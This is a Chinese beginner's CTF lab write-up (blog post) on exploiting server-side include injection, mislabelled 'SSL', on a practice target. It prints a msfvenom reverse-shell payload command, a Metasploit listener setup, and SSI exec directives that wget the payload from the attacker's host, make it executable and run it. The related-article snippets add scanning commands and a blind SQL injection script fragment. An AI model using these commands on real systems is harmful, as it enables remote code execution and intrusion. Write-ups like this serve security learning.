小白学习CTF第九天-web安全(SSL注入)

最新推荐文章于 2024-05-12 09:30:00 发布
最新推荐文章于 2024-05-12 09:30:00 发布
阅读量1.8k 收藏 4
点赞数 2
文章标签: python linux 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105655249
版权

ssl注入

在这里插入图片描述

ssl注入介绍

在这里插入图片描述
简单了解一下ssl注入攻击:

信息探测

这个与之前的都一样:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
接下来要根据扫描的道德信息,进行漏洞利用

漏洞利用

在这里插入图片描述
可以尝试打开一些比较敏感的位置:
在这里插入图片描述
像这个就是禁止访问的,我们就可以忽略了,但是有的时候我们也要查看网页源代码看看是否有关键信息。
在这里插入图片描述
打开这个可以看我不让我们访问的目录,尝试访问,下载对应的文件,看看有没有关键信息。
在这里插入图片描述
可以把这两个文件都下载了,之后查看有没有信息,我下载完之后看了一下,没有关键信息,我就没有截图了。
再尝试打开别的网址,看看有没有可以利用的漏洞:
在这里插入图片描述
这个是有可能注入的点。
在这里插入图片描述
第一眼看到这个不知道有什么用,但是发现到下面的就知道这个是干什么的了。
在这里插入图片描述
在这里插入图片描述
可以利用之前的发现的命令格式,进行注入攻击。
利用之前发现的命令,尝试一下:
在这里插入图片描述
在这里插入图片描述
发现我们输入的命令他给我们注释掉了,怎么办?
我们可以使用大小写进行替换,之后加上!
在这里插入图片描述
在这里插入图片描述
简单的替换大小写,还是不行,我们加上!
在这里插入图片描述
这回发现可以了:
在这里插入图片描述
成功利用了漏洞!!!

上传webshell

在这里插入图片描述
首先我们要制作一个webshell,这次我们尝试使用python制作一个,这次不用php了。

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw > /root/桌面/shell_ssl.py

在这里插入图片描述
之后我们启动监听:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.17.128

在这里插入图片描述
在这里插入图片描述
run一下:
在这里插入图片描述
下载对应的脚本,执行获取反弹shell,在此之前,移动文件 :

mv shell.py /var/www/html/

在这里插入图片描述
之后还要开启对应的apache2服务;

service apache2 start
service apache2 status //检测是否开启

在这里插入图片描述
利用之前发现的漏洞,下载利用webshell,反弹对应的权限:

<!--#EXEC cmd="wget http://192.168.17.128/shell_ssl.py"-->
<!--#EXEC cmd="chmod 777 shell_ssl.py"-->
<!--#EXEC cmd="python shell_ssl.py"-->

首先要下载webshell
在这里插入图片描述
下载成功!
在这里插入图片描述
之后对于下载的文件赋予权限:
在这里插入图片描述
赋予权限成功!
在这里插入图片描述
执行webshell
在这里插入图片描述
停顿中,应该是反弹成功了!
在这里插入图片描述
反弹成功!
在这里插入图片描述

获取权限之后执行操作

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以了!!!

总结

在这里插入图片描述
靶场本次没有设置flag,可以了!

bbhh1139
关注
CTF夺旗-教程
mutou990的博客
08-08 2025
3.CTF-SSH私钥泄露 #locate ssh2john//通过locate命令查找到ssh2john在文件的位置,直接用python执行即可 "john后回显无密码"问题的解决 知识点:赋权;ssh登录;栈溢出(缓冲区溢出提权); 2 4.CTF夺旗-SSH服务渗透(拿到第一个用户权限) ...
小试牛刀:SQL 注入攻击
热门推荐
carol980206的博客
02-24 6万+
小试牛刀:SQL注入攻击一、检测注入点二、判断是否存在 SQL 注入可能三、数据库爆破四、字段爆破五、数据库表爆破六、用户名、密码爆破七、总结 一、检测注入点 首先,在 http://120.203.13.75:6815/?id=1 目标站点页面发现了 ?id,说明可以通过查询 id=1 的内容来获得页面。 这相当于查询语句: select * from [表名] where id = '1'; ...
ssl检测加密、证书工具、非对称和对称加密以及和CTF相关的各种编码
qq_41814777的博客
10-06 488
CTF杂项、全套CTF编码、全套CTF算法:http://ctf.ssleye.com/ 对称和非对称加密算法、ssl漏洞检测、证书工具:http://www.ssleye.com/ 检测项:http://scan.ssleye.com/
ssl模块加入到已经编译好的apache
让我们荡起双桨的博客
12-06 1596
如果在配置文件httpd.conf没有: LoadModule ssl_module modules/mod_ssl.so 则说明Apache没有安装ssl模块,可以在编译安装Apache的时候,加上--enable-ssl --with-ssl参数。 如果不想重新编译,可以选择动态编译ssl模块。 1、首先使用whereis openssl获取lib和include的...
网络安全入门过程教程:服务器端模板注入 (SSTI)
最新发布
qingkahui24689的博客
05-12 665
每个应用程序都会有动态的部分,“动态的部分” 是经过服务器传输展示的。例如:微信卡片左边固定展示:昵称、性别、微信号、地区。而右边是你的个人信息。左边是固定的,右边是动态的(你可以任意更改)。服务器模板就是提供一种快捷美观的方法来写代码展示出来。php复制代码
ftp系实战和ssl注入实战
weixin_51339377的博客
03-30 621
nmap进行扫描 发现目标开启的21号端口 ftp的服务 看到了ProFTPD 可以考虑一下使用一些其现成的漏洞 搜索漏洞库 我们也可以在msf进行搜索 直接使用相应的漏洞即可 这是利用了一些软件的旧版本所存在的漏洞进行的提权 接下来是ssl注入实战 第一步正常nmap扫描 发现只开放了80端口 所以只能从web端入手了 后续发现网站url上是shtml 说明可能存在ssl注入的可能 使用nikto对其进行扫描 有可能存在ss...
6-4CTF夺旗入门教程--SSI注入
高冷的宅先生
04-10 424
1.SSI注入攻击介绍 SSI的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应结果。 如果网站目录出现了.stm,.shtm,.shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSI注入攻击。 2.信息探测 #扫描主机服务信息以及服务版本 nmap -sV 192.168.2.119 #快速扫描主机全部信息 nmap -T4 -A -v 192.1...
基于SSL的Harbor镜像仓库的搭建
weixin_43394724的博客
05-30 965
软件环境 项目 描述 备注 操作系统 CentOS 7.6 1908 2C 4G Docker 20.10.6 Docker-compose 1.29.2 Harbor 2.2.2 参考官方Harbor Installation Prerequisites 基础环境搭建 安装操作系统 OS 安装完成后做如下配置: 禁用SELinux 不重启系统 [root@localhost ~]# setenforce 0   #重启电脑后失效 修改文件,需要重启系统 [root
CTF-web安全解题事项
zerolea的博客
03-22 5258
Robots协议: robots.txt是搜索引擎访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。 直接在网址后面加后缀: /robots.txt 二、文件备份: 常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history 如:index...
SSLtrip攻击解决方案
cnbird's blog
04-03 1392
由于目前一种专门针对SSL、HTTPS的新型攻击工具在网上广泛传播,严重影响SSL/HTTPS所保护的用户身份等敏感信息数据的安全性。鉴于我国重要信息系统广泛使用SSL/HTTPS技术用于敏感信息传输保护,为防止重大安全事件发生,很多信息安全监管机构纷纷发文要求进一步推进等级保护安全整改、建设工作,如深圳市公安局的《深圳公安局公共信息网络安全监察分局文件》(深公网[2009]86号发文)。脉山龙有
cap 包如何把TCP包解成ssl
dsq88163的专栏
05-14 368
选择一条tcp,选择 decode AS -> SSL , value为 7275.
CTF-12.web安全SSI注入
woo233的博客
09-20 752
SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssI来执行系统命令,并返回对应的结果。如果在网站目录发现了.stm, .shtm .shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSl注入攻击。实验环境攻击机: kali 192.168.1.103靶场机器: linux 192.168.1.106在ctf比赛,对于ssi漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;
Web安全CTF测试赛
CHN_Zgq's Blog
11-20 3677
一次CTF测试赛
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF常考题型之一,它将实际渗透过程的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2674
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
CTFshow-WEB入门-SQL注入()
feng的博客
02-08 1859
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
CTF_webshow_web8盲注脚本
weixin_54227009的博客
05-14 339
直接大佬脚本开始嗦: import requests url = 'http://438302a7-56ba-4098-ad0a-0f245da447b0.challenge.ctf.show/index.php?id=-1/**/or/**/' name = '' # 循环45次( 循环次数按照返回的字符串长度自定义) for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d
SSI注入
Vinson的博客
09-29 222
ssi是为了赋予html静态页面动态的效果,通过ssi执行系统命令,返回对应结果 若在网站目录发现.stm,.shtm,.shtml,且网站对ssi的输入没有做到严格过滤,很可能收到ssi注入攻击 攻击机192.168.1.108 靶机192.168.1.109 nikto -host ip + Multiple index files found: /index.php, /inde...
mysql与SQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQL与SQL注入Web安全CTF(Capture The Flag,网络安全竞赛)的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值